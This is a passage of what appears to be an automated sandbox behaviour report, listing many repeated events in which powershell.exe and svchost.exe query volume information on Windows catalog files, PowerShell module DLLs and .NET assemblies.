Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
